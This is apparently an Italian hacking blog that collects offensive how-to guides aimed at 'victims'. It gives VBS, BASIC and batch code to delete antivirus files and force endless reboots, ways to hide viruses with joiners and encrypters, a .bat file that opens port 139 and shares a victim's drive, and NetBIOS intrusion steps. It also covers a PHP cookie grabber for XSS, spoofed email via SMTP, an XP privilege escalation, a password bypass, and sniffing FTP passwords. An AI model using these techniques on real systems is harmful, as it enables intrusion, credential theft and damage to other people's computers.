Ok, allora…. COMINCIAMO!
I TOOLS NECESSARI:

Vi servono:
- un computer
- un virus
- Blade Joiner (o un qualsiasi Joiner x WinZozz)
- Bat2Com
- ExOM
-Merendine
-Musica

FUNZIONAMENTO DI UN ANTIVIRUS
Le tecniche utilizzate dai prodotti antivirus sono due: la ricerca euristica e il riconoscimento della firma digitale.
* Ricerca euristica
L’antivirus analizza il file (programma o documento) cercando porzioni di codice in grado di svolgere azioni insolite. Funzione tipica delle applicazioni più costose, destinate in particolare a sistemi di protezione aziendale e per grandi banche dati, è una tecnica molto complessa perché implica, da parte di chi la sviluppa, la conoscenza perfetta dei programmi e dei sistemi operativi. In pratica, si tratta di capire come può essere infettato un sistema e di conoscere i punti deboli dei programmi che possono esservi installati. A questo punto il programmatore dovrà sviluppare un software in grado di anticipare l’attività sospetta diretta ai punti deboli identificati. Il grande pregio di questa tecnica consiste nel fatto che l’antivirus è un passo in avanti rispetto ai possibili virus, è già pronto cioè prima che questi vengano creati. Il suo difetto nel numero di falsi allarmi, anche molto elevato in funzione della sensibilità e della completezza del prodotto. La maggior parte degli antivirus in commercio include anche un motore di ricerca euristica, la cui efficacia è tuttavia strettamente correlata al prezzo del prodotto: un antivirus per uso personale non offre, in genere, un sistema di rilevazione euristica particolarmente efficace.
* Riconoscimento della firma digitale
L’antivirus mette a confronto il codice dei file da controllare con quello dei virus conosciuti. Le informazioni su questi ultimi sono raccolte in un database che deve essere aggiornato a intervalli regolari e brevissimi (anche una volta al giorno). È la tecnica utilizzata dalla maggior parte dei prodotti per uso personale (in effetti, da tutti i prodotti, con un’unica eccezione). Il suo pregio è che consente di mantenere contenuto il prezzo dell’antivirus, il suo difetto è che si trova sempre un passo indietro rispetto ai virus. Perché sia efficace occorre infatti che il virus sia stato trovato e che la sua descrizione sia stata inserita nel database: solo così potrà essere riconosciuto e neutralizzato dal software. Per i programmi più diffusi, i rispettivi produttori mettono a disposizione aggiornamenti frequenti del database, anche quotidiani: è quindi necessario collegarsi al sito ed effettuare l’aggiornamento online delle informazioni, procedura che in genere non richiede più di qualche minuto.

TECNICA 1: IL JOINER

Una famosa tecnica x nascondere i virus sono i joiner. Il loro funzionamento è molto semplice: creano un file .EXE che è l’unione di due files. Uno di questi 2 files deve essere per forza un file .EXE. L’antivirus non capta il virus mescolato con un altro file perchè non risconosce la firma digitale… L’unico difetto di questa tecnica è che i files ottenuti dalla fusione sono files molto grandi, e quindi potrebbero destare sospetto. Il migliore joiner in circolazione su internet è il Blade Joiner. Questo infatti dispone di diverse funzionalità (esempio: ha la notificazione ad ICQ); uno tra i migliori è anche il Senna Spy Exe Maker. Questi due files sono scaricabili dalla SEZIONE UTILIY del sito. I files mescolati nn devono essere per forza files .EXE ma possono anche essere di diversa estensione (jpeg,bitmap…).
TECNICA 2: ELIMINAZIONE
Una tecnica molto laboriosa per eliminare il controllo dell’antivirus è eliminare l’antivirus!!! Semplicemente basta creare un file .VBS con il comando di trovare il file principale dell’antivirus e eliminarlo, quindi riavviare il computer ed eseguire il virus.
Come? Così:
TAGLIA QUI
SALVA IL FILE COME CERCA.VBS
‘*********************************************
Cerca files antivirus e distruggi
‘*********************************************
Dim WSHShell
Set WSHShell = WScript.CreateObject(”WScript.Shell”)
Dim windir,systemdir
object = “C:” ‘ Il drive in cui devi effettuare la ricerca
On Error Resume Next
Dim fso, f1, f2, s
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set f2 = fso.GetFile(object & “danieletempinserisci_il.nome”) ‘Inserisci il nome del file
f2.Delete
‘Nel caso non sappiate quale antivirus sia installato nel computer della vittima vi consiglio di inserire più nomi di files da cercare ed eliminare. Basta compiare per più volte il codice che si trova dopo il “On Error resume next” e prima di questo suggerimento.
Sub Welcome()
Dim intDoIt
intDoIt = MsgBox(L_Welcome_MsgBox_Message_Text, _
vbOKCancel + vbInformation, _
L_Welcome_MsgBox_Title_Text )
If intDoIt = vbCancel Then
WScript.Quit
End If
End Sub
TAGLIA QUI
Rinomina il file CERCA.VBS con CERCA.VBSS
A questo punto c’è il bisogno di aggiungere una stringa nel file AUTOEXEC.BAT che apra il virus dopo il riavvio del pc. In questo caso bastano poche righe di Basic:
Taglia qui…
REM *********************************************
REM *
REM * Aggiugni stringhe a file autoexec.bat
REM *
REM *
REM *
REM *
REM *
REM *********************************************
REM RINOMINA IL FILE COME CON.BAS
10 CLS
20 OPEN (”C:AUTOEXEC.BAT”) FOR APPEND AS #1
30 PRINT #1, ” ” ‘Inserisci tra le virgolette il nome del virus. Non dimenticarti del ‘ percorso se il file non si trova nella directory C:
40 PRINT #1,”c:windowsrundll32.exe user,exitwindows” ‘Riavvia il pc all’infinito…
50 CLOSE
60 END
Taglia qui…
Dopo aver scritto il codice sorgente compila il file CON.BAS. Il risultato sarà CON.EXE. Rinomina CON.EXE COME CON.EYE
Ora manca solo un programma Smascheri(al momento giusto) ed esegua gli altri due file. Ho scelto x queste azioni un file .BAT. Il codice sorgente è il seguente:
Taglia qui…
@echo off
echo *********************************************>nul
echo * *>nul
echo * Rinomina i files, eseguili,cancellali e *>nul
echo * *>nul
echo * riavvia il pc. *>nul
echo * *>nul
echo * *>nul
echo * *>nul
echo * *>nul
echo * *>nul
echo *********************************************>nul
@echo>nul
@echo RINOMINA IL FILE SETUP.BAT>NUL
@ren CERCA.VBSS CERCA.VBS
@ren CON.EYE CON.EXE
@cerca.vbs
@con.exe
@c:windowsrundll32.exe user,exitwindows
@exit
Taglia qui…
Anche in questo caso è meglio nascondere il codice sorgente del file SETUP.BAT. Quindi apriamo il programma bat2com e scriviamo:
bat2com SETUP.BAT
Il risultato sarà un file di nome SETUP.COM
Racchiudi tutto in una cartella con il virus. Magari racchiudi il tutto con Winzip e il tuo virus è pronto x essere inviato.
TECNICA 3: ENCRYPTER
Questa è una nuova tecnica che ho sperimentato e ideato personalmente. Consiste nell’encryptare un file in modo che nn possa essere disassemblato e quindi neanche rilevato dal sistema di riconoscimento della firma digitale dell’antivirus. Il vero problema di questa tecnica, è il programma. Questo infatti è difficilmente reperibile soprattuto per i virus che solitamente funzionano sotto dos. Il programma migliore che ho trovato è stato l’ExOm. Per encryptare un file basta digitare…
exom nomefile.estensione
Nessuna di queste tecniche da SOLA garantisce un affidabilità del 100%. Vi consiglio infatti di mescolare tra loro le tecniche descritte. Come??
Esempio:
Per prima cosa encrypto il file; poi lo mescolo con un altro file con il blade joiner. In seguito creo un sistema per eliminare l’anitvirus come quello descritto nel capitolo 5.0. In questo modo avrete più possibilità di successo.
IL FILE TIPE SPOOFING 
Lo spoofing dei tipi di file è una tecnica usata, spesso anche dai virus, per simulare che un certo file corrisponda ad un tipo diverso da ciò che è realmente: in questo modo si può ingannare un utente facendogli credere che un certo attachment sembri un’immagine JPG, un archivio ZIP o qualsiasi altra cosa, quando in realtà non lo è. Un primo tipo di inganno, quello delle estensioni, è molto semplice da realizzare e si basa sul fatto che Windows (95/98/ME) gestisce male le estensioni associate ai diversi tipi di files. Infatti il sistema di Microsoft è stato progettato (di default) per non visualizzare le estensioni dei tipi di files che hanno un’associazione nel registro. Ciò vuol dire che un file ARCHIVIO.ZIP viene mostrato all’interno di Esplora Risorse e degli altri programmi solo col nome ARCHIVIO, senza visualizzare la sua estensione e può essere riconosciuto dalla classica icona associata ai file di Winzip. Questa constatazione ci pone un primo interrogativo: cosa succede ad un file rinominato (volutamente) col nome ARCHIVIO.ZIP.EXE? Questo viene considerato un file di Winzip o un eseguibile? Ecco quindi in cosa consiste il primo inganno sui tipi di file: usando questo trucco della “doppia estensione” Windows riconosce il file come un .EXE (quindi lo tratta come un eseguibile) tuttavia visualizza solo il nome senza l’estensione, quindi per un utente ignaro di questo fatto, il file porterà il nome ARCHIVIO.ZIP, quando in realtà è un’applicazione .EXE. Questo trucco è stato usato da molti worm come il famigerato ZIP Explorer. Per accorgersi della frode l’unica cosa che si può fare (oltre ad usare un buon antivirus) è quella di far visualizzare a Windows le estensioni dei files, anche per quelli associati ad applicazioni. Questa opzione si può attivare da Esplora Risorse nel menu Strumenti/Opzioni Cartella o Visualizza/Opzioni Cartella. In questo modo un’e-mail che porta dietro una attachment, visualizza il file allegato col suo nome reale, mostrando magari che questo in realtà è un eseguibile.

Entrare in un pc con NetBios attivo


Per poter entrare in un pc dal NETBIOS:
Per prima cosa dovete avere l’Ip della vittima con il netbios ATTIVO ossia con la porta 139 aperta e il disco “C:\” condiviso.
per aprire la porta 139 e condividere il disco C:\ di un computer, aprite il blocco note e inserite il seguente codice:

CODICE
netsh firewall add portopening TCP 139 PORTAWEB
net share disco=C:\

Adesso rinominate (nomefile).bat e mandatelo alla vittima! XD Se invece volete entrare in un pc a caso con il netbios attivo scaricate xSharez (il quale scanerrizza vari ip e quelli con la 139 aperta li inserisce in una lista)
DOPO AVER TROVATO L’IP CON IL NETBIOS ATTIVO E CON IL DISCO C:\ CONDIVISO:
-Andate su start
-Digitate:
cd c:/windows
Nbtstat -A “IP” (l’ip della persona con il netbioz attivo)
A questo punto vi comparirà una specie di tabella con nome,tipo e stato……
Prendiamo il nome e l’ip della nostra vittima e scriviamo nel DOS:
Edit c:/windows/lmhosts
“IP”"NOME VITTIMA”#PRE(ci va prima l’IP della nostra vittima scelta nella tabella precedente e poi il nome).
Adesso andate su salva e poi su esci——–>vi ritroverete sul DOS e a questo punto digitate:
Nbtstat -R
Net View //”NOME VITTIMA”
Se nn avete sbagliato niente vi uscirà la lista delle periferiche condivise(HD,Stampanti)ecc.
Ora basta andare in RISORSE DI RETE e cliccare su STRUMENTI, CONNETTI A UNITA’ RETE e inserite come nome dell’unità rete:
//”NOME VITTIMA”/C
L’unità C ora è condisa e avete il suo HD nelle vostre mani. XDXD
 
COME DIFENDERSI DA QUESTO ATTACCO:
Andate su pannello di controllo>> rete e connessioni internet>> connessioni di rete, fate click con il tasto destro su una connessione e andate su proprietà>> rete e deselezionate il “client per reti microsoft”, adesso cliccate su “protocollo internet tcp-ip” e andate su proprietà>> avanzate>> wins e
disabilitate il netbios, ora cliccate su applica e fate ok.

Cookie Grabber



Intanto cos’è un cookie:
Altro non è che un file di testo contenente determinati dati e viene inviato dal server web in contemporanea alla pagina internet e successivamente salvato in una cartella del vostro browser.
Servono per far si che il borwser possa identificarli in modo da associarli al server che li ha generati. Di conseguenza possiamo dire che ogni server prosuce il suo cookie per permetterne poi il riconoscimento quando ci si ricollega.
Inoltre un cookie memorizza cnhe tutti i dati inseriti nei form, come username e password per accedere ad aree riservate di siti. avviene più precisamente che dopo aver inserito i dati di accesso ad esempio e dato l’ok, il server ci genera il cookie contenente tali dati in modo da esser riconosciuti dal server anche al prossimo accesso…si intuisce che qualora settassimo il nostro browser in modo da rifiutare i cookie, non ci si potrebbe autenticare su nessun sito.
Qundi vien generato un cookie ogni volta che visitate qualunque sito e vengon salvate tutte le impostazioni e operazioni che fate.
Capite allora la grossa importanza di un cookie e il “potere” che esso ha!
E a questo punto sorge la domanda: e se qualcuno si impossessasse dei miei cookie? meglio ancora dei cookie con dati di accesso…?
E qui ecco che subentra appunto il cookie grabber!!!

Cookie grabber:
Catturando dei cookie con un cookie grabber, si può risalire quindi a tante informazioni personali delle vittime alle quali li abbiamo sottratti.
Bastano poche righe di codice in php per creare un cookie grabber e implementarlo e utilizzarlo in diversi modi…un esempio e con una XSS.
Scriviamo queste poche righe di codice su un qualsiasi editor di testo, salviamo il file nel formato .php e lo uppiamo sul nostro spazio web. A questo punto basta indirizzare in qualche modo la vittima alla pagina web alla quale è collegato il cookie grabber (con un po’ di social engineering) e saranno catturati i suoi cookie con tutti i dati…anche username e password…che saranno salvati su un file .txt che si trova sempre nel nostro spazio web (nell’esempio saranno salvati nel file “file.txt”).
Le password non saranno esplicite però, ma in “hash md5″ (cioè criptate con questa chiave)…ma basta un semplice programma o uno dei tanti siti web che offrono la conversione da questa forma criptata in forma chiara e leggibile, ed è fatta.

Esempio di un cookie grabber:


CODICE:
$cookie = $_GET['c'];
$ip = getenv (’REMOTE_ADDR’);
$date=date(”j F, Y, g:i a”);
$referer=getenv (’HTTP_REFERER’);
$fp = fopen(’file.txt’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Referer: ‘.$referer.’

’);
fclose($fp);
?>

Inviare Fake Mail Via Telnet



Il termine Fake E-mail vuole significare l’invio di e-mail false, cioè con il mittente falsificato.

Intruduzioni:
Telnet è quel programma già presente in Windows dove permette di connettersi ad un server scrivendo solo l’indirizzo e la porta che utilizza.
Ad esempio:
Trasferimento file (ftp) porta 21
Telnet porta 23
Invio della posta (smtp) porta 25
Pagine web (http) porta 80
Ricezione posta (pop) porta 110
Ovviamente ogni programma ha pure la sua porta di connessione…ma noi per inviare e-mail fake (false e-mail).

Procedimento:
Prima di tutto aprimo Telnet andando su Start>Esegui , scrivere Telnet e cliccare su OK. Appena si apre la solita schermata di DOS (Immagine), adesso non resta che conneterci al Provider per l’invio della post. Di solito, dipende il provider che volete utilizzare usa questo indirizzo:
Smtp.nomesito.com
Pop.nomesito.it
Mail.nomesito.net
Adesso scegliete il provider che più vi piace, io ad esempio userò out.alice.it oppure mail.tin.it. Se volete una lista di provide, andate QUI.
Vi ricordo che telnet dopo che si connette al server, non permette di cancellare le parole che avete scritto male, quindi scrivete con calma.
-Dopo aver scelto il rpovider scrivete su Telnet cosi: open smtp.ilprovider.it 25 e dopotelnet si connetterà e se vi siete connessi al server mail.tin.it vi spunterà nella prossima finestra un messaggio simile:
220 vsmtp3.tin.it ESMTP Service <7.3.122> ready
-Dopo che vi spunta una scritta simile dobbiamo salutare il server e lo si fa scrivendo helo smtp.ilprovider.it ,dopo il server rispondere 250 smtp.ilrpovider.it.
-Adesso scriviamo mail from: che potete benissimo falsificare, ma attenzione ovviamente il server loggera il vostro indirizzo IP, quindi state attenti all’utilizzo che ne fate di queste fake e-mail.
Esempio:
mail from:
-Il server vi rispondere con 250 MAIL FROM: OK. Adesso dovete scrivete il destinatario in questo modo rcpt to:.
-Adesso per via che alcuni server non permettono l’invio di e-mail senza il soggetto, scriviamo il soggetto scrivendo questa sintassi: subject: -soggetto senza trattini- e premere due volte Invio.

Esempio:
subject: prova per un post
-Ora scriamo il messaggio dell’e-mail in questo modo, ovvero scrivendo data e cliccare su Invio. Dopo scrivete tutto il testo che volete e per chiudere basta mettere un solo puntino all’inizio del rigo. Dopo se tutto è andato bene il server vi rispondere con mail accepted oppoure con Queued mail for delivery. Se volete disconnettervi basta scrivere quit e cliccare su Invio.
Dettagli aggiuntivi:
-Se volte scrivere anche il nome che il destinatario deve visualizzare basta scrivere prima di mail from: il seguente testo: from: -nome mittente senza i trattini- e potete fare la stessa cosa con il nome del destinatario, scrivendo cosi: to: -nome destinatario-.
P.S. Disattivare firewall e antivirus

Attacchi Bluetooth



Cosa è il bluetooth? Il Bluetooth è una specifica industriale per reti personali senza fili (WPAN: Wireless Personal Area Network). Fornisce un metodo standard, economico e sicuro per scambiare informazioni tra dispositivi diversi attraverso una frequenza radio sicura a corto raggio. Bluetooth cerca i dispositivi entro un raggio di qualche decina di metri, tali dispositivi sono coperti dal segnale e li mette in comunicazione tra di loro. Questi dispositivi possono essere ad esempio palmari, telefoni cellulari, personal computer, portatili, stampanti, fotocamere digitali, console per videogiochi.
Blue Snarfing:
Tecnica in grado di dare accesso in terminale Bluetooth permettendo la copia di dati dal dispositivo.
L’attacco è praticabile sia nel caso di un bluetooth visibile sia nel caso di un bluetooth “nascosto”.
Il protocollo colpito è denominato Object Exchange Protocol (OBEX), e serve per inviare e ricevere file tra dispositivi.
Un tool molto utilizzato in questi casi è btscanner creato per prelevare le maggiori informazioni da un dispositivo bluetooth.
BlueBug:
Un Attacco BlueBug si effettua sfruttando un noto bug del servizio in questione.
Grazie a questa tecnica è possibile ottenere il controllo di un cellulare sfruttandolo per inviare e leggere SMS, per effettuare chiamate,vedere video,foto,e tanto altro…
L’attaccante deve trovarsi in un raggio di 10 m dalla vittima.
BlueSmack:
Identico al famigerato ”Ping of Death” il Bluesmack è in grado di mettere fuori combattimento un dispositivo Bluetooth.
Blue Snarf++:
Tipologia di attacco BlueSnrf a cui sono vulnerabil però solo alcuni device dei Bluetooth.La particolarità di questo bug consiste nella possibilità, da parte dell’attaccante, di avere a disposizione il filesystem con permessi di scrittura e lettura.
Ci sono anche altri tipi di attacchi,, come il: BlueJacking, Bluesniping e il War-Nibbling.

Escalation dei Privilegi in XP

Introduzione:
Con alcuni semplici comandi eseguiti dalla console si possono ottenere privilegi a livello di sistema su un PC in cui gira Windows Xp.
Il run level “system” è superiore a quello di Administrator, praticamente ti concede il completo controllo del sistema operativo e del suo kernel.
In molte versioni di Win Xp l’exploit, di seguito spiegato, funziona addirittura con il semplice utente Guest!
Questa “tecnica” può essere utile se siete l’amministratore del sistema e per qualche ragione avete perso la password e desiderate cambiarla senza dover reinstallare tutto d’accapo, ma siccome questo “hack” può eseguito da un qualsiasi utente non autorizzato non si può star certo tranquilli!
L’account “System” equivale praticamente all’utente root dei sistemi operativi unix based, l’utente Administrator infatti non è un vero utente root, esso non può bloccare davvero tutti i processi, alcuni sono controllati direttamente dal sistema operativo, e non possono essere in alcun modo fermati, se non appunto dall’utente System gestito direttamente dal sistema operativo ed inaccessibile agli altri utenti.

Procedura:

Con questo exploit basteranno pochi e semplici comandi per diventare il “Padrone Assoluto” del computer.
Basta eseguire queste semplici operazioni:

-Avviare il prompt dei comandi (Start->Avvia->cmd->invio)

Al prompt scrivere:
CODICE
at


Se la risposta è “accesso negato”, siete Sfortunati, la vostra versione di windows è abbastanza patchata da impedire l’escalation dei privilegi.
Se invece la risposta è: “There are no entries in the list” (o una lista di voci) allora il computer è esposto.
L’accesso potrà avvenire, a seconda della versione di Windows installata, addirittura con l’utente Guest, in altri casi invece questo hack funziona soltanto con i privilegi di Amministratore.

Basta provare, il comando da digitare è:

CODICE
at 15:25 /interactive “cmd.exe”


(Fate attenzione, è importante che il formato della data sia in 24 ore, se così non fosse sarà necessario modificare il formato prima di proseguire).
Ora portate l’orario di Windows avanti di un minuto, ad esempio se sono le 16:30 spostate l’orario alle 16:31.

Digitando di nuovo il comando at, questa volta senza nessun altro attributo, dovreste visualizzare qualcosa di simile a questo:
 


Non appena l’orologio di sistema raggiungerà l’orario da voi reimpostato (quindi un minuto dopo) magicamente si avvierà un nuovo prompt dei comandi.
Con una sostanziale differenza però, questo prompt è stato avviato con privilegi di sistema!
Dovreste vedere una schermata simile a questa:

Come noterete il titolo del prompt di comandi è cambiato da cmd.exe a svchost.exe (abbreviazione di Service Host).
Ora che abbiamo la nuova console di comandi è possibile chiudere quella vecchia. A questo punto avviate il Task Manager premendo i tasti CTRL+ALT+DELETE o scrivendo direttamente taskmgr.
Entrati nel task manager cercate la voce explorer.exe e killatela. Il desktop e tutte le cartelle aperte dovrebbero sparire, dovrebbe rimanere visibile soltanto il prompt dei comandi.

A questo punto digitate nel prompt di comandi:

CODICE
explorer.exe

Magicamente riapparirà il desktop….ma se controllerete bene questo non sarà il desktop dell’utente, bensì il desktop dell’utente SYSTEM!
Aprendo infatti il menù Start di Windows dovreste vedere in alto non più il nome dell’utente con cui vi eravate loggati, bensì la scritta: “SYSTEM”.
Anche aprendo il task manager potrete rendervi conto che il processo explorer.exe risulta funzionare con privilegi di sistema.
Per ripristinare il tutto basta disconnettersi e rientrare.

Con i privilegi dell’utente SYSTEM potrete fare QUALSIASI COSA, cancellare gli altri utenti, cancellare l’utente amministratore e crearne un altro, praticamente siete il Dio del sistema!

Scavalcare pswd XP



Ecco un metodo per scavalcare le password di accesso degli account Windows XP

A cosa serve questa guida: Serve per avere accesso al computer bloccato da una password.

Per prima cosa, accedente il PC protetto, ed accedere in modalità provvisoria.

Nella modalità provvisoria accediamo con Administrator. NOTA: Administrator non ha mai, o quasi nel 90 % dei casi la password. Essendo un utente "nascosto" difficilmente qualcuno l'ha cambiata. Se l'hanno cambiata anche ad Administrator, c'è poco da fare. Spegnete il PC e arrendetevi.

Una volta effettuato l'accesso provvisorio in Administrator, apriamo il prompt dei comandi (start, esegui, cmd) e digitiamo il seguente comando.

CODICE
net user %­username% password

Allora, dove c'è scritto %­username% va messo il nome dell'account da scavalcare ( se magari volete cambiare la pass all'account in cui siete, lasciare %­username% ) e al posto di password immettere la password che volete mettere.

A questo punto non ci resta che aspettare che il comando si esegua, una volta ricevuto il messaggio di conferma, riavviamo il PC e accediamo all'account con la password che abbiamo impostato.

Ed ecco a voi il pc!

WireShark

Ecco la guida a WireShark

 


Prima di iniziare cosa serve:
-Un pc con linux
-Qualcosa da smangiucchiare

Ok... Let's go!


Cosa è WireShark?
Wireshark consente di analizzare la struttura di una rete a caccia di eventuali errori di configurazione, inoltre è in grado di identificare molti tipi di incapsulamento e di isolare e visualizzare tutti i campi che compongono un pacchetto. Funziona anche da packet-sniffer…. In modo simile a tcpdump.

Installazione:
Inziamo con l’installare il programma…in che modo? Semplice:
CODICE
sudo apt-get install wireshark (debian/Ubuntu) emerge wireshark (Gentoo) yum install wireshark (RedHat/Fedora).


Avvio:
CODICE
sudo wireshark


Utilizzo:
Vediamo come scoprire una password di una sessione FTP, così , intercettando una connessione tra un client e un server possiamo scoprire i dati di accesso all’account!

Iniziamo con il catturare il traffico: avviamo Wireshark, clicchiamo quindi su Capture/Interfaces e sceglieamo l’interfaccia che va verso la rete (per esempio eth0)…clicchiamo su Start, da questo momento la nostra interfaccia potra ricevere tutti i pacchetti in transito sulla rete!
Adesso apriamo un secondo terminale e proviamo ad effettuare una normale sessione FTP verso l’IP di un server FTP che usiamo per il nostro test…inseriamo la password per il login e diamo qualche comando…chiudiamo la sessione.

Adesso possiamo tornare nella finestra principale di Wireshark, vedremo che ci sono molti pacchetti che sono transitati in rete dal momento in cui abbiamo avviato la cattura…clicchiamo su Stop Capture (Ctrl+E) e esaminiamo il traffico acquisito…
Capire qualcosa tra tutto il traffico non è certo cosa semplice….quindi ricorreremo ad un filtro BPF, cioè quello che ci mostrerà soltanto i pacchetti che fanno parte di una connessione FTP, quindi nel campo Filter digitiamo ftp. Sarà immediatamente evidenziato il traffico della nostra sessione e la password!!!

Bene…adesso potete divertirvi come meglio volete… xD

Utilizo2: Cattura di una sessione HTTP

Iniziamo…avviamo il nostro Wireshark, clicchiamo su Edit/Preferences/Protocols/HTTP e spuntiamo l’opzione Uncompress entity bodies per fare in modo che sia il programma che decomprimerà i contenuti web, che sono stati inviati in modo compresso.
Durante la cattura, dobbiamo spostarci nel box Filter dalla finestra principale e impostiamo un filtro per mostrare solo il trafficio HTTP, basterà quindi scrivere http. In questo momento ogni pagina che sarà visitata dagli utenti delle rete genererà questo tipo di traffico e noi saremo lì per catturarlo….
Scegliamo un request http, selezioniamolo e faccoamo clic con il tasto destro e scegliamo l’opzione Follow TCP Stream, così facendo wireshark aprirà una nuova finestra contenente la ricostruzione di tutta la sessione HTTP in ordine cronologico che ha dato vita al request selezionato.
Possiamo anche isolare solo le richieste di ricerche effettuate su motori di ricerca, e estrarre le parole chiave ricercate dagli utenti. Per fare questo basterà inserire il filtro http.request.uri contains “search”, nel campo Filter


Utilizzo3: Come difendersi dalla scansione delle porte

Useremo wireshark per identificare e isolare eventuali portscan effettuati sulle macchine della rete.

Iniziamo…
CODICE
sudo wireshark


Scegliamo l’interfaccia di rete su cui ascoltare e avviamo una live capture cliccando su Capture/Start. Cercheremo di individuare e isolare i tentativi di scansione delle porte effettuati tramite Nmap. Portiamoci su una seconda macchina di test ed effettuiamo con Nmap un SYN Scan e un Xmas Scan: nmap -sS -F ip e nmap -sX -F ip (l’opzione -F effettuerà la scansione solo sulle porte standard). Aspettiamo che l’operazione sia terminata e torniamo sulla macchina che sta effettuando la cattura del traffico.

Ci chiediamo: come facciamo per isolare un Syn Scan (paccheto SYN)?

Chiaramente dovremmo utilizzare un filtro che ci evidenzierà le richieste SYN formati da pacchetti di lunghezza 0, faremo così: ip.proto==6 and tcp.flags==2 and tcp.len==0. Questo filtro ci mostrerà solo i pacchetti di tipo TCP che hanno il flag SYN settato e che sono privi di payload.

Il filtro per l’ Xmas scan è molto simile, basterà cambiare il parametro tcp.flags che dovremmo impostare uguale a 41.
Con questi piccoli consigli potete sbizzarrirvi a discriminare moltre altre tipologie di scan….

Utilizzo4: Analisi sessione di MSN


In questo articolo vedremo come si svolge un analisi di una sessione MSN, in pratica useremo Wireshark per esaminare il flusso di una conversazione MSN fra due client!
Iniziamo…
per prima cosa avviamo una sessione di chat con un qualunque contatto msg della nostra lista, chiaramente dovremmo tenere wireshark attivo per tutta la durata della sessione, in questo modo avremo il log di tutti i messaggi che verranno scambiati fra il client e il server principale. Al termine della conversazione fermiamo la cattura, e come sempre vedremo la finestra dei pacchetti popolata con tutto il traffico generato dalla rete. Se guardiamo con attenzione il listato noteremo che ci sono alcuni pacchetti con protocollo MSNMS (MSN Messenger Service), dovremo quindi evidenziare questi pacchetti e lasciar lavorare il dissector.
Nella finestra Filter impostiamo il filtro MSNMS, e cerchiamo la stringa JOI che è il marcatore utilizzato dal protocollo MSN quando si avvia una chat. Evidenziamo il pacchetto, tasto destro e clicchiamo su Follow TCP Stream, questo per fare in modo che il filtro non escluda pacchetti importanti. Se scorriamo la finestra possiamo identificare anche i messaggi di chat. I comandi più interessanti sono MSG: indica l’arrivo di un messaggio, USR: conferma l’avvenuta connessione con un client, BYE: quando un utente remoto chiude la finestra dei messaggi.

Bene..spero che queste informazioni vengano usate solo per scopo didattico e per fare delle prove sulla propria rete… Insomma non fate cagate

Virus Zoo


Salve a tutti! Oggi vi voglio parlare di un fantastico "tool"...
Si chiama VirusZoo...

Questo sito permette di infettare via internet una macchina vistuale appositamente creata per questo scopo. La macchina puo essere infettata solo con trojan o rootkit...
Ma, a quanto pare a breve si potranne uppare i propri virus! e vederli all opera!!
Con questo sito si è in grado di vedere all opera uno dei miglioni di virus contenuti nel database di Virus Zoo...
Basta registrarsi e il gioco è fatto... è molto intuitivo penso non ci sia bisogno di fare una guida...
Naturalmente è sicuro al 100% e nn si ha rischi di essere infettati.
Ogni tanto è possibile che il sito non sia raggiungibile o non funzioni, questo perche i virus funzionando veramente possono danneggiare VERAMENTE la macchina virtuale che è da rifare...

Detto cio non vi resta solo che "divertirvi" VIRUS ZOO

Work In Progress

LAVORI IN CORSO...

Stiamo lavorando per voi... Ci scusiamo per il disagio... Saremo ON a breve

Benvenuti

Benvenuti! Questo blog tratta principalmente di hacking, informatica, phreaking, internet.
Le guide che verrano postate di seguito sono da considerarsi solo a scopo informativo e per uso personale.
Il blog, blogger, ecc non si assumono nessuna responsabilità dell uso che farete delle tecniche riportate in questo blog.

Possibili danni arrecati al vosto pc, cellulare, router, e quant altro non sono attribuibili al blog in quanto le tecniche riportate di seguito sono da utilizzare a poprio "rischio e pericolo"

Detto questo non mi rimane che augurarvi: BUONA NAVIGAZIONE!